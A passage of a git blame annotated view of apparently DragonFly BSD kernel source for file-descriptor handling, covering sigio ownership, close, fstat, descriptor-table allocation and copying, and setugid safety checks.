7bf8660a 540funsetown(struct sigio *sigio)
984263bc 541{
984263bc
MD
542 if (sigio == NULL)
543 return;
e43a034f 544 crit_enter();
984263bc 545 *(sigio->sio_myref) = NULL;
e43a034f 546 crit_exit();
984263bc
MD
547 if (sigio->sio_pgid < 0) {
548 SLIST_REMOVE(&sigio->sio_pgrp->pg_sigiolst, sigio,
549 sigio, sio_pgsigio);
550 } else /* if ((*sigiop)->sio_pgid > 0) */ {
551 SLIST_REMOVE(&sigio->sio_proc->p_sigiolst, sigio,
552 sigio, sio_pgsigio);
553 }
554 crfree(sigio->sio_ucred);
7bf8660a 555 free(sigio, M_SIGIO);
984263bc
MD
556}
557
558/* Free a list of sigio structures. */
559void
7bf8660a 560funsetownlst(struct sigiolst *sigiolst)
984263bc
MD
561{
562 struct sigio *sigio;
563
564 while ((sigio = SLIST_FIRST(sigiolst)) != NULL)
565 funsetown(sigio);
566}
567
568/*
569 * This is common code for FIOSETOWN ioctl called by fcntl(fd, F_SETOWN, arg).
570 *
571 * After permission checking, add a sigio structure to the sigio list for
572 * the process or process group.
573 */
574int
7bf8660a 575fsetown(pid_t pgid, struct sigio **sigiop)
984263bc
MD
576{
577 struct proc *proc;
578 struct pgrp *pgrp;
579 struct sigio *sigio;
984263bc
MD
580
581 if (pgid == 0) {
582 funsetown(*sigiop);
583 return (0);
584 }
585 if (pgid > 0) {
586 proc = pfind(pgid);
587 if (proc == NULL)
588 return (ESRCH);
589
590 /*
591 * Policy - Don't allow a process to FSETOWN a process
592 * in another session.
593 *
594 * Remove this test to allow maximum flexibility or
595 * restrict FSETOWN to the current process or process
596 * group for maximum safety.
597 */
598 if (proc->p_session != curproc->p_session)
599 return (EPERM);
600
601 pgrp = NULL;
602 } else /* if (pgid < 0) */ {
603 pgrp = pgfind(-pgid);
604 if (pgrp == NULL)
605 return (ESRCH);
606
607 /*
608 * Policy - Don't allow a process to FSETOWN a process
609 * in another session.
610 *
611 * Remove this test to allow maximum flexibility or
612 * restrict FSETOWN to the current process or process
613 * group for maximum safety.
614 */
615 if (pgrp->pg_session != curproc->p_session)
616 return (EPERM);
617
618 proc = NULL;
619 }
620 funsetown(*sigiop);
7bf8660a 621 sigio = malloc(sizeof(struct sigio), M_SIGIO, M_WAITOK);
984263bc
MD
622 if (pgid > 0) {
623 SLIST_INSERT_HEAD(&proc->p_sigiolst, sigio, sio_pgsigio);
624 sigio->sio_proc = proc;
625 } else {
626 SLIST_INSERT_HEAD(&pgrp->pg_sigiolst, sigio, sio_pgsigio);
627 sigio->sio_pgrp = pgrp;
628 }
629 sigio->sio_pgid = pgid;
e9a372eb 630 sigio->sio_ucred = crhold(curproc->p_ucred);
984263bc 631 /* It would be convenient if p_ruid was in ucred. */
41c20dac 632 sigio->sio_ruid = curproc->p_ucred->cr_ruid;
984263bc 633 sigio->sio_myref = sigiop;
e43a034f 634 crit_enter();
984263bc 635 *sigiop = sigio;
e43a034f 636 crit_exit();
984263bc
MD
637 return (0);
638}
639
640/*
641 * This is common code for FIOGETOWN ioctl called by fcntl(fd, F_GETOWN, arg).
642 */
643pid_t
7bf8660a 644fgetown(struct sigio *sigio)
984263bc
MD
645{
646 return (sigio != NULL ? sigio->sio_pgid : 0);
647}
648
4336d5df
JS
649/*
650 * Close many file descriptors.
651 */
652/* ARGSUSED */
653
654int
655closefrom(struct closefrom_args *uap)
656{
657 return(kern_closefrom(uap->fd));
658}
659
660int
661kern_closefrom(int fd)
662{
663 struct thread *td = curthread;
664 struct proc *p = td->td_proc;
665 struct filedesc *fdp;
4336d5df
JS
666
667 KKASSERT(p);
668 fdp = p->p_fd;
669
670 if (fd < 0 || fd > fdp->fd_lastfile)
671 return (0);
5e8cfac8
JS
672
673 do {
674 if (kern_close(fdp->fd_lastfile) == EINTR)
4336d5df 675 return (EINTR);
5e8cfac8
JS
676 } while (fdp->fd_lastfile > fd);
677
4336d5df
JS
678 return (0);
679}
680
984263bc
MD
681/*
682 * Close a file descriptor.
683 */
984263bc 684/* ARGSUSED */
4336d5df 685
984263bc 686int
41c20dac 687close(struct close_args *uap)
12693083
MD
688{
689 return(kern_close(uap->fd));
690}
691
692int
693kern_close(int fd)
984263bc 694{
dadab5e9
MD
695 struct thread *td = curthread;
696 struct proc *p = td->td_proc;
697 struct filedesc *fdp;
41c20dac 698 struct file *fp;
984263bc
MD
699 int error;
700 int holdleaders;
701
dadab5e9
MD
702 KKASSERT(p);
703 fdp = p->p_fd;
704
984263bc 705 if ((unsigned)fd >= fdp->fd_nfiles ||
0679adc4 706 (fp = fdp->fd_files[fd].fp) == NULL)
984263bc
MD
707 return (EBADF);
708#if 0
0679adc4 709 if (fdp->fd_files[fd].fileflags & UF_MAPPED)
984263bc
MD
710 (void) munmapfd(p, fd);
711#endif
69908319 712 funsetfd(fdp, fd);
984263bc
MD
713 holdleaders = 0;
714 if (p->p_fdtol != NULL) {
715 /*
716 * Ask fdfree() to sleep to ensure that all relevant
717 * process leaders can be traversed in closef().
718 */
719 fdp->fd_holdleaderscount++;
720 holdleaders = 1;
721 }
722
723 /*
724 * we now hold the fp reference that used to be owned by the descriptor
725 * array.
726 */
0679adc4 727 while (fdp->fd_lastfile > 0 && fdp->fd_files[fdp->fd_lastfile].fp == NULL)
984263bc 728 fdp->fd_lastfile--;
984263bc
MD
729 if (fd < fdp->fd_knlistsize)
730 knote_fdclose(p, fd);
dadab5e9 731 error = closef(fp, td);
984263bc
MD
732 if (holdleaders) {
733 fdp->fd_holdleaderscount--;
734 if (fdp->fd_holdleaderscount == 0 &&
735 fdp->fd_holdleaderswakeup != 0) {
736 fdp->fd_holdleaderswakeup = 0;
737 wakeup(&fdp->fd_holdleaderscount);
738 }
739 }
740 return (error);
741}
742
984263bc 743int
8f6f8622 744kern_fstat(int fd, struct stat *ub)
984263bc 745{
dadab5e9
MD
746 struct thread *td = curthread;
747 struct proc *p = td->td_proc;
748 struct filedesc *fdp;
41c20dac 749 struct file *fp;
984263bc
MD
750 int error;
751
dadab5e9 752 KKASSERT(p);
8f6f8622 753
dadab5e9 754 fdp = p->p_fd;
8f6f8622 755 if ((unsigned)fd >= fdp->fd_nfiles ||
0679adc4 756 (fp = fdp->fd_files[fd].fp) == NULL)
984263bc
MD
757 return (EBADF);
758 fhold(fp);
8f6f8622 759 error = fo_stat(fp, ub, td);
dadab5e9 760 fdrop(fp, td);
8f6f8622 761
984263bc
MD
762 return (error);
763}
984263bc
MD
764
765/*
766 * Return status information about a file descriptor.
767 */
984263bc 768int
41c20dac 769fstat(struct fstat_args *uap)
984263bc 770{
8f6f8622 771 struct stat st;
984263bc
MD
772 int error;
773
8f6f8622
DRJ
774 error = kern_fstat(uap->fd, &st);
775
984263bc 776 if (error == 0)
8f6f8622 777 error = copyout(&st, uap->sb, sizeof(st));
984263bc
MD
778 return (error);
779}
780
781/*
8f6f8622
DRJ
782 * XXX: This is for source compatibility with NetBSD. Probably doesn't
783 * belong here.
984263bc 784 */
984263bc 785int
41c20dac 786nfstat(struct nfstat_args *uap)
984263bc 787{
8f6f8622
DRJ
788 struct stat st;
789 struct nstat nst;
984263bc
MD
790 int error;
791
8f6f8622
DRJ
792 error = kern_fstat(uap->fd, &st);
793
984263bc 794 if (error == 0) {
8f6f8622
DRJ
795 cvtnstat(&st, &nst);
796 error = copyout(&nst, uap->sb, sizeof (nst));
984263bc 797 }
984263bc
MD
798 return (error);
799}
800
801/*
802 * Return pathconf information about a file descriptor.
803 */
984263bc
MD
804/* ARGSUSED */
805int
41c20dac 806fpathconf(struct fpathconf_args *uap)
984263bc 807{
dadab5e9
MD
808 struct thread *td = curthread;
809 struct proc *p = td->td_proc;
810 struct filedesc *fdp;
984263bc
MD
811 struct file *fp;
812 struct vnode *vp;
813 int error = 0;
814
dadab5e9
MD
815 KKASSERT(p);
816 fdp = p->p_fd;
984263bc 817 if ((unsigned)uap->fd >= fdp->fd_nfiles ||
0679adc4 818 (fp = fdp->fd_files[uap->fd].fp) == NULL)
984263bc
MD
819 return (EBADF);
820
821 fhold(fp);
822
823 switch (fp->f_type) {
824 case DTYPE_PIPE:
825 case DTYPE_SOCKET:
826 if (uap->name != _PC_PIPE_BUF) {
827 error = EINVAL;
828 } else {
c7114eea 829 uap->sysmsg_result = PIPE_BUF;
984263bc
MD
830 error = 0;
831 }
832 break;
833 case DTYPE_FIFO:
834 case DTYPE_VNODE:
835 vp = (struct vnode *)fp->f_data;
c7114eea 836 error = VOP_PATHCONF(vp, uap->name, uap->sysmsg_fds);
984263bc
MD
837 break;
838 default:
839 error = EOPNOTSUPP;
840 break;
841 }
dadab5e9 842 fdrop(fp, td);
984263bc
MD
843 return(error);
844}
845
984263bc
MD
846static int fdexpand;
847SYSCTL_INT(_debug, OID_AUTO, fdexpand, CTLFLAG_RD, &fdexpand, 0, "");
848
69908319
JH
849static void
850fdgrow(struct filedesc *fdp, int want)
851{
0679adc4
MD
852 struct fdnode *newfiles;
853 struct fdnode *oldfiles;
69908319
JH
854 int nf, extra;
855
856 nf = fdp->fd_nfiles;
857 do {
858 /* nf has to be of the form 2^n - 1 */
859 nf = 2 * nf + 1;
860 } while (nf <= want);
861
0679adc4 862 newfiles = malloc(nf * sizeof(struct fdnode), M_FILEDESC, M_WAITOK);
69908319
JH
863
864 /*
865 * deal with file-table extend race that might have occured
866 * when malloc was blocked.
867 */
868 if (fdp->fd_nfiles >= nf) {
0679adc4 869 free(newfiles, M_FILEDESC);
69908319
JH
870 return;
871 }
69908319
JH
872 /*
873 * Copy the existing ofile and ofileflags arrays
874 * and zero the new portion of each array.
875 */
876 extra = nf - fdp->fd_nfiles;
0679adc4
MD
877 bcopy(fdp->fd_files, newfiles, fdp->fd_nfiles * sizeof(struct fdnode));
878 bzero(&newfiles[fdp->fd_nfiles], extra * sizeof(struct fdnode));
879
880 oldfiles = fdp->fd_files;
881 fdp->fd_files = newfiles;
69908319 882 fdp->fd_nfiles = nf;
0679adc4
MD
883
884 if (oldfiles != fdp->fd_builtin_files)
885 free(oldfiles, M_FILEDESC);
69908319
JH
886 fdexpand++;
887}
888
889/*
890 * Number of nodes in right subtree, including the root.
891 */
892static __inline int
893right_subtree_size(int n)
894{
895 return (n ^ (n | (n + 1)));
896}
897
898/*
899 * Bigger ancestor.
900 */
901static __inline int
902right_ancestor(int n)
903{
904 return (n | (n + 1));
905}
906
907/*
908 * Smaller ancestor.
909 */
910static __inline int
911left_ancestor(int n)
912{
913 return ((n & (n + 1)) - 1);
914}
915
916void
917fdreserve(struct filedesc *fdp, int fd, int incr)
918{
919 while (fd >= 0) {
0679adc4
MD
920 fdp->fd_files[fd].allocated += incr;
921 KKASSERT(fdp->fd_files[fd].allocated >= 0);
69908319
JH
922 fd = left_ancestor(fd);
923 }
924}
925
926/*
927 * Allocate a file descriptor for the process.
928 */
984263bc 929int
dda4b42b 930fdalloc(struct proc *p, int want, int *result)
984263bc 931{
41c20dac 932 struct filedesc *fdp = p->p_fd;
69908319
JH
933 int fd, rsize, rsum, node, lim;
934
935 lim = min((int)p->p_rlimit[RLIMIT_NOFILE].rlim_cur, maxfilesperproc);
936 if (want >= lim)
937 return (EMFILE);
938 if (want >= fdp->fd_nfiles)
939 fdgrow(fdp, want);
984263bc
MD
940
941 /*
942 * Search for a free descriptor starting at the higher
943 * of want or fd_freefile. If that fails, consider
944 * expanding the ofile array.
945 */
69908319
JH
946retry:
947 /* move up the tree looking for a subtree with a free node */
948 for (fd = max(want, fdp->fd_freefile); fd < min(fdp->fd_nfiles, lim);
949 fd = right_ancestor(fd)) {
0679adc4 950 if (fdp->fd_files[fd].allocated == 0)
69908319 951 goto found;
984263bc 952
69908319 953 rsize = right_subtree_size(fd);
0679adc4 954 if (fdp->fd_files[fd].allocated == rsize)
69908319 955 continue; /* right subtree full */
984263bc
MD
956
957 /*
69908319
JH
958 * Free fd is in the right subtree of the tree rooted at fd.
959 * Call that subtree R. Look for the smallest (leftmost)
960 * subtree of R with an unallocated fd: continue moving
961 * down the left branch until encountering a full left
962 * subtree, then move to the right.
984263bc 963 */
69908319
JH
964 for (rsum = 0, rsize /= 2; rsize > 0; rsize /= 2) {
965 node = fd + rsize;
0679adc4
MD
966 rsum += fdp->fd_files[node].allocated;
967 if (fdp->fd_files[fd].allocated == rsum + rsize) {
69908319 968 fd = node; /* move to the right */
0679adc4 969 if (fdp->fd_files[node].allocated == 0)
69908319
JH
970 goto found;
971 rsum = 0;
972 }
984263bc 973 }
69908319 974 goto found;
984263bc 975 }
69908319
JH
976
977 /*
978 * No space in current array. Expand?
979 */
980 if (fdp->fd_nfiles >= lim)
981 return (EMFILE);
982 fdgrow(fdp, want);
983 goto retry;
984
985found:
986 KKASSERT(fd < fdp->fd_nfiles);
0679adc4 987 fdp->fd_files[fd].fileflags = 0;
69908319
JH
988 if (fd > fdp->fd_lastfile)
989 fdp->fd_lastfile = fd;
990 if (want <= fdp->fd_freefile)
991 fdp->fd_freefile = fd;
992 *result = fd;
0679adc4 993 KKASSERT(fdp->fd_files[fd].fp == NULL);
69908319 994 fdreserve(fdp, fd, 1);
984263bc
MD
995 return (0);
996}
997
998/*
999 * Check to see whether n user file descriptors
1000 * are available to the process p.
1001 */
1002int
7bf8660a 1003fdavail(struct proc *p, int n)
984263bc 1004{
41c20dac 1005 struct filedesc *fdp = p->p_fd;
0679adc4 1006 struct fdnode *fdnode;
41c20dac 1007 int i, lim, last;
984263bc
MD
1008
1009 lim = min((int)p->p_rlimit[RLIMIT_NOFILE].rlim_cur, maxfilesperproc);
1010 if ((i = lim - fdp->fd_nfiles) > 0 && (n -= i) <= 0)
1011 return (1);
1012
1013 last = min(fdp->fd_nfiles, lim);
0679adc4
MD
1014 fdnode = &fdp->fd_files[fdp->fd_freefile];
1015 for (i = last - fdp->fd_freefile; --i >= 0; ++fdnode) {
1016 if (fdnode->fp == NULL && --n <= 0)
984263bc
MD
1017 return (1);
1018 }
1019 return (0);
1020}
1021
1022/*
39f91578
MD
1023 * falloc:
1024 * Create a new open file structure and allocate a file decriptor
1025 * for the process that refers to it. If p is NULL, no descriptor
1026 * is allocated and the file pointer is returned unassociated with
1027 * any process. resultfd is only used if p is not NULL and may
1028 * separately be NULL indicating that you don't need the returned fd.
fad57d0e
MD
1029 *
1030 * A held file pointer is returned. If a descriptor has been allocated
0679adc4 1031 * an additional hold on the fp will be made due to the fd_files[]
fad57d0e 1032 * reference.
984263bc
MD
1033 */
1034int
39f91578 1035falloc(struct proc *p, struct file **resultfp, int *resultfd)
984263bc 1036{
c4cb6d8b
HP
1037 static struct timeval lastfail;
1038 static int curfail;
fad57d0e
MD
1039 struct file *fp;
1040 int error;
c4cb6d8b 1041
fad57d0e
MD
1042 fp = NULL;
1043
1044 /*
1045 * Handle filetable full issues and root overfill.
1046 */
60ee93b9 1047 if (nfiles >= maxfiles - maxfilesrootres &&
9b3f1fd5 1048 ((p && p->p_ucred->cr_ruid != 0) || nfiles >= maxfiles)) {
c4cb6d8b
HP
1049 if (ppsratecheck(&lastfail, &curfail, 1)) {
1050 printf("kern.maxfiles limit exceeded by uid %d, please see tuning(7).\n",
9b3f1fd5 1051 (p ? p->p_ucred->cr_ruid : -1));
c4cb6d8b 1052 }
fad57d0e
MD
1053 error = ENFILE;
1054 goto done;
984263bc 1055 }
fad57d0e 1056
984263bc
MD
1057 /*
1058 * Allocate a new file descriptor.
984263bc
MD
1059 */
1060 nfiles++;
7bf8660a 1061 fp = malloc(sizeof(struct file), M_FILE, M_WAITOK | M_ZERO);
984263bc 1062 fp->f_count = 1;
984263bc
MD
1063 fp->f_ops = &badfileops;
1064 fp->f_seqcount = 1;
fad57d0e 1065 if (p)
a235f7bb 1066 fp->f_cred = crhold(p->p_ucred);
fad57d0e
MD
1067 else
1068 fp->f_cred = crhold(proc0.p_ucred);
1069 LIST_INSERT_HEAD(&filehead, fp, f_list);
1070 if (resultfd) {
1071 if ((error = fsetfd(p, fp, resultfd)) != 0) {
1072 fdrop(fp, p->p_thread);
1073 fp = NULL;
39f91578 1074 }
a235f7bb 1075 } else {
fad57d0e 1076 error = 0;
984263bc 1077 }
fad57d0e
MD
1078done:
1079 *resultfp = fp;
64f33bc8 1080 return (error);
fad57d0e
MD
1081}
1082
1083/*
1084 * Associate a file pointer with a file descriptor. On success the fp
0679adc4 1085 * will have an additional ref representing the fd_files[] association.
fad57d0e
MD
1086 */
1087int
1088fsetfd(struct proc *p, struct file *fp, int *resultfd)
1089{
69908319 1090 int fd, error;
fad57d0e 1091
69908319
JH
1092 fd = -1;
1093 if ((error = fdalloc(p, 0, &fd)) == 0) {
fad57d0e 1094 fhold(fp);
0679adc4 1095 p->p_fd->fd_files[fd].fp = fp;
fad57d0e 1096 }
69908319 1097 *resultfd = fd;
984263bc
MD
1098 return (0);
1099}
1100
69908319
JH
1101void
1102funsetfd(struct filedesc *fdp, int fd)
1103{
0679adc4
MD
1104 fdp->fd_files[fd].fp = NULL;
1105 fdp->fd_files[fd].fileflags = 0;
69908319
JH
1106 fdreserve(fdp, fd, -1);
1107 if (fd < fdp->fd_freefile)
1108 fdp->fd_freefile = fd;
1109}
1110
a235f7bb
MD
1111void
1112fsetcred(struct file *fp, struct ucred *cr)
1113{
1114 crhold(cr);
1115 crfree(fp->f_cred);
1116 fp->f_cred = cr;
1117}
1118
984263bc
MD
1119/*
1120 * Free a file descriptor.
1121 */
1122void
7bf8660a 1123ffree(struct file *fp)
984263bc
MD
1124{
1125 KASSERT((fp->f_count == 0), ("ffree: fp_fcount not 0!"));
1126 LIST_REMOVE(fp, f_list);
1127 crfree(fp->f_cred);
21739618
MD
1128 if (fp->f_ncp) {
1129 cache_drop(fp->f_ncp);
1130 fp->f_ncp = NULL;
1131 }
984263bc 1132 nfiles--;
7bf8660a 1133 free(fp, M_FILE);
984263bc
MD
1134}
1135
1136/*
1137 * Build a new filedesc structure.
1138 */
1139struct filedesc *
7bf8660a 1140fdinit(struct proc *p)
984263bc 1141{
0679adc4 1142 struct filedesc *newfdp;
41c20dac 1143 struct filedesc *fdp = p->p_fd;
984263bc 1144
0679adc4 1145 newfdp = malloc(sizeof(struct filedesc), M_FILEDESC, M_WAITOK|M_ZERO);
bccde7a3 1146 if (fdp->fd_cdir) {
0679adc4
MD
1147 newfdp->fd_cdir = fdp->fd_cdir;
1148 vref(newfdp->fd_cdir);
1149 newfdp->fd_ncdir = cache_hold(fdp->fd_ncdir);
690a3127 1150 }
bccde7a3
MD
1151
1152 /*
1153 * rdir may not be set in e.g. proc0 or anything vm_fork'd off of
1154 * proc0, but should unconditionally exist in other processes.
1155 */
1156 if (fdp->fd_rdir) {
0679adc4
MD
1157 newfdp->fd_rdir = fdp->fd_rdir;
1158 vref(newfdp->fd_rdir);
1159 newfdp->fd_nrdir = cache_hold(fdp->fd_nrdir);
bccde7a3
MD
1160 }
1161 if (fdp->fd_jdir) {
0679adc4
MD
1162 newfdp->fd_jdir = fdp->fd_jdir;
1163 vref(newfdp->fd_jdir);
1164 newfdp->fd_njdir = cache_hold(fdp->fd_njdir);
690a3127
MD
1165 }
1166
984263bc 1167 /* Create the file descriptor table. */
0679adc4
MD
1168 newfdp->fd_refcnt = 1;
1169 newfdp->fd_cmask = cmask;
1170 newfdp->fd_files = newfdp->fd_builtin_files;
1171 newfdp->fd_nfiles = NDFILE;
1172 newfdp->fd_knlistsize = -1;
1173
1174 return (newfdp);
984263bc
MD
1175}
1176
1177/*
1178 * Share a filedesc structure.
1179 */
1180struct filedesc *
7bf8660a 1181fdshare(struct proc *p)
984263bc
MD
1182{
1183 p->p_fd->fd_refcnt++;
1184 return (p->p_fd);
1185}
1186
1187/*
1188 * Copy a filedesc structure.
1189 */
1190struct filedesc *
7bf8660a 1191fdcopy(struct proc *p)
984263bc 1192{
41c20dac 1193 struct filedesc *newfdp, *fdp = p->p_fd;
0679adc4 1194 struct fdnode *fdnode;
41c20dac 1195 int i;
984263bc
MD
1196
1197 /* Certain daemons might not have file descriptors. */
1198 if (fdp == NULL)
1199 return (NULL);
1200
0679adc4
MD
1201 newfdp = malloc(sizeof(struct filedesc), M_FILEDESC, M_WAITOK);
1202 *newfdp = *fdp;
690a3127 1203 if (newfdp->fd_cdir) {
597aea93 1204 vref(newfdp->fd_cdir);
690a3127
MD
1205 newfdp->fd_ncdir = cache_hold(newfdp->fd_ncdir);
1206 }
6bdbb368
DR
1207 /*
1208 * We must check for fd_rdir here, at least for now because
1209 * the init process is created before we have access to the
1210 * rootvode to take a reference to it.
1211 */
690a3127 1212 if (newfdp->fd_rdir) {
597aea93 1213 vref(newfdp->fd_rdir);
690a3127
MD
1214 newfdp->fd_nrdir = cache_hold(newfdp->fd_nrdir);
1215 }
1216 if (newfdp->fd_jdir) {
597aea93 1217 vref(newfdp->fd_jdir);
690a3127
MD
1218 newfdp->fd_njdir = cache_hold(newfdp->fd_njdir);
1219 }
984263bc
MD
1220 newfdp->fd_refcnt = 1;
1221
1222 /*
1223 * If the number of open files fits in the internal arrays
1224 * of the open file structure, use them, otherwise allocate
1225 * additional memory for the number of descriptors currently
1226 * in use.
1227 */
1228 if (newfdp->fd_lastfile < NDFILE) {
0679adc4 1229 newfdp->fd_files = newfdp->fd_builtin_files;
984263bc
MD
1230 i = NDFILE;
1231 } else {
1232 /*
69908319 1233 * Compute the smallest file table size
984263bc
MD
1234 * for the file descriptors currently in use,
1235 * allowing the table to shrink.
1236 */
1237 i = newfdp->fd_nfiles;
69908319
JH
1238 while ((i-1)/2 > newfdp->fd_lastfile && (i-1)/2 > NDFILE)
1239 i = (i-1)/2;
0679adc4
MD
1240 newfdp->fd_files = malloc(i * sizeof(struct fdnode),
1241 M_FILEDESC, M_WAITOK);
984263bc
MD
1242 }
1243 newfdp->fd_nfiles = i;
0679adc4
MD
1244
1245 if (fdp->fd_files != fdp->fd_builtin_files ||
1246 newfdp->fd_files != newfdp->fd_builtin_files
1247 ) {
1248 bcopy(fdp->fd_files, newfdp->fd_files,
1249 i * sizeof(struct fdnode));
1250 }
984263bc
MD
1251
1252 /*
1253 * kq descriptors cannot be copied.
1254 */
1255 if (newfdp->fd_knlistsize != -1) {
0679adc4
MD
1256 fdnode = &newfdp->fd_files[newfdp->fd_lastfile];
1257 for (i = newfdp->fd_lastfile; i >= 0; i--, fdnode--) {
1258 if (fdnode->fp != NULL && fdnode->fp->f_type == DTYPE_KQUEUE)
69908319 1259 funsetfd(newfdp, i); /* nulls out *fpp */
0679adc4 1260 if (fdnode->fp == NULL && i == newfdp->fd_lastfile && i > 0)
984263bc
MD
1261 newfdp->fd_lastfile--;
1262 }
1263 newfdp->fd_knlist = NULL;
1264 newfdp->fd_knlistsize = -1;
1265 newfdp->fd_knhash = NULL;
1266 newfdp->fd_knhashmask = 0;
1267 }
1268
0679adc4
MD
1269 fdnode = newfdp->fd_files;
1270 for (i = newfdp->fd_lastfile; i-- >= 0; fdnode++) {
1271 if (fdnode->fp != NULL)
1272 fhold(fdnode->fp);
984263bc
MD
1273 }
1274 return (newfdp);
1275}
1276
1277/*
1278 * Release a filedesc structure.
1279 */
1280void
41c20dac 1281fdfree(struct proc *p)
984263bc 1282{
dadab5e9 1283 struct thread *td = p->p_thread;
41c20dac 1284 struct filedesc *fdp = p->p_fd;
0679adc4 1285 struct fdnode *fdnode;
41c20dac 1286 int i;
984263bc
MD
1287 struct filedesc_to_leader *fdtol;
1288 struct file *fp;
1289 struct vnode *vp;
1290 struct flock lf;
1291
1292 /* Certain daemons might not have file descriptors. */
1293 if (fdp == NULL)
1294 return;
1295
1296 /* Check for special need to clear POSIX style locks */
1297 fdtol = p->p_fdtol;
1298 if (fdtol != NULL) {
1299 KASSERT(fdtol->fdl_refcount > 0,
1300 ("filedesc_to_refcount botch: fdl_refcount=%d",
1301 fdtol->fdl_refcount));
1302 if (fdtol->fdl_refcount == 1 &&
1303 (p->p_leader->p_flag & P_ADVLOCK) != 0) {
1304 i = 0;
0679adc4
MD
1305 fdnode = fdp->fd_files;
1306 for (i = 0; i <= fdp->fd_lastfile; i++, fdnode++) {
1307 if (fdnode->fp == NULL ||
1308 fdnode->fp->f_type != DTYPE_VNODE)
984263bc 1309 continue;
0679adc4 1310 fp = fdnode->fp;
984263bc
MD
1311 fhold(fp);
1312 lf.l_whence = SEEK_SET;
1313 lf.l_start = 0;
1314 lf.l_len = 0;
1315 lf.l_type = F_UNLCK;
1316 vp = (struct vnode *)fp->f_data;
1317 (void) VOP_ADVLOCK(vp,
1318 (caddr_t)p->p_leader,
1319 F_UNLCK,
1320 &lf,
1321 F_POSIX);
dadab5e9 1322 fdrop(fp, p->p_thread);
0679adc4
MD
1323 /* reload due to possible reallocation */
1324 fdnode = &fdp->fd_files[i];
984263bc
MD
1325 }
1326 }
1327 retry:
1328 if (fdtol->fdl_refcount == 1) {
1329 if (fdp->fd_holdleaderscount > 0 &&
1330 (p->p_leader->p_flag & P_ADVLOCK) != 0) {
1331 /*
1332 * close() or do_dup() has cleared a reference
1333 * in a shared file descriptor table.
1334 */
1335 fdp->fd_holdleaderswakeup = 1;
1336 tsleep(&fdp->fd_holdleaderscount,
377d4740 1337 0, "fdlhold", 0);
984263bc
MD
1338 goto retry;
1339 }
1340 if (fdtol->fdl_holdcount > 0) {
1341 /*
1342 * Ensure that fdtol->fdl_leader
1343 * remains valid in closef().
1344 */
1345 fdtol->fdl_wakeup = 1;
377d4740 1346 tsleep(fdtol, 0, "fdlhold", 0);
984263bc
MD
1347 goto retry;
1348 }
1349 }
1350 fdtol->fdl_refcount--;
1351 if (fdtol->fdl_refcount == 0 &&
1352 fdtol->fdl_holdcount == 0) {
1353 fdtol->fdl_next->fdl_prev = fdtol->fdl_prev;
1354 fdtol->fdl_prev->fdl_next = fdtol->fdl_next;
1355 } else
1356 fdtol = NULL;
1357 p->p_fdtol = NULL;
1358 if (fdtol != NULL)
7bf8660a 1359 free(fdtol, M_FILEDESC_TO_LEADER);
984263bc
MD
1360 }
1361 if (--fdp->fd_refcnt > 0)
1362 return;
1363 /*
1364 * we are the last reference to the structure, we can
1365 * safely assume it will not change out from under us.
1366 */
0679adc4
MD
1367 for (i = 0; i <= fdp->fd_lastfile; ++i) {
1368 if (fdp->fd_files[i].fp)
1369 closef(fdp->fd_files[i].fp, td);
984263bc 1370 }
0679adc4
MD
1371 if (fdp->fd_files != fdp->fd_builtin_files)
1372 free(fdp->fd_files, M_FILEDESC);
690a3127
MD
1373 if (fdp->fd_cdir) {
1374 cache_drop(fdp->fd_ncdir);
984263bc 1375 vrele(fdp->fd_cdir);
690a3127 1376 }
bccde7a3
MD
1377 if (fdp->fd_rdir) {
1378 cache_drop(fdp->fd_nrdir);
1379 vrele(fdp->fd_rdir);
1380 }
690a3127
MD
1381 if (fdp->fd_jdir) {
1382 cache_drop(fdp->fd_njdir);
984263bc 1383 vrele(fdp->fd_jdir);
690a3127 1384 }
984263bc 1385 if (fdp->fd_knlist)
7bf8660a 1386 free(fdp->fd_knlist, M_KQUEUE);
984263bc 1387 if (fdp->fd_knhash)
7bf8660a
MD
1388 free(fdp->fd_knhash, M_KQUEUE);
1389 free(fdp, M_FILEDESC);
984263bc
MD
1390}
1391
1392/*
1393 * For setugid programs, we don't want to people to use that setugidness
1394 * to generate error messages which write to a file which otherwise would
1395 * otherwise be off-limits to the process.
1396 *
1397 * This is a gross hack to plug the hole. A better solution would involve
1398 * a special vop or other form of generalized access control mechanism. We
1399 * go ahead and just reject all procfs file systems accesses as dangerous.
1400 *
1401 * Since setugidsafety calls this only for fd 0, 1 and 2, this check is
1402 * sufficient. We also don't for check setugidness since we know we are.
1403 */
1404static int
1405is_unsafe(struct file *fp)
1406{
1407 if (fp->f_type == DTYPE_VNODE &&
1408 ((struct vnode *)(fp->f_data))->v_tag == VT_PROCFS)
1409 return (1);
1410 return (0);
1411}
1412
1413/*
1414 * Make this setguid thing safe, if at all possible.
1415 */
1416void
dadab5e9 1417setugidsafety(struct proc *p)
984263bc 1418{
dadab5e9 1419 struct thread *td = p->p_thread;
984263bc 1420 struct filedesc *fdp = p->p_fd;
41c20dac 1421 int i;
984263bc
MD
1422
1423 /* Certain daemons might not have file descriptors. */
1424 if (fdp == NULL)
1425 return;
1426
1427 /*
0679adc4 1428 * note: fdp->fd_files may be reallocated out from under us while
984263bc
MD
1429 * we are blocked in a close. Be careful!
1430 */
1431 for (i = 0; i <= fdp->fd_lastfile; i++) {
1432 if (i > 2)
1433 break;
0679adc4 1434 if (fdp->fd_files[i].fp && is_unsafe(fdp->fd_files[i].fp)) {
984263bc
MD
1435 struct file *fp;
1436
1437#if 0
0679adc4 1438 if ((fdp->fd_files[i].fileflags & UF_MAPPED) != 0)
984263bc
MD
1439 (void) munmapfd(p, i);
1440#endif
1441 if (i < fdp->fd_knlistsize)
1442 knote_fdclose(p, i);
1443 /*
1444 * NULL-out descriptor prior to close to avoid
1445 * a race while close blocks.
1446 */
0679adc4 1447 fp = fdp->fd_files[i].fp;
69908319 1448 funsetfd(fdp, i);
0679adc4 1449 closef(fp, td);
984263bc
MD
1450 }
1451 }
0679adc4 1452 while (fdp->fd_lastfile > 0 && fdp->fd_files[fdp->fd_lastfile].fp == NULL)
984263bc
MD
1453 fdp->fd_lastfile--;
1454}
1455
1456/*
1457 * Close any files on exec?
1458 */
1459void
dadab5e9 1460fdcloseexec(struct proc *p)
984263bc 1461{
dadab5e9 1462 struct thread *td = p->p_thread;
984263bc 1463 struct filedesc *fdp = p->p_fd;
41c20dac 1464 int i;
984263bc
MD
1465
1466 /* Certain daemons might not have file descriptors. */
1467 if (fdp == NULL)
1468 return;
1469
1470 /*
0679adc4
MD
1471 * We cannot cache fd_files since operations may block and rip
1472 * them out from under us.
984263bc
MD
1473 */
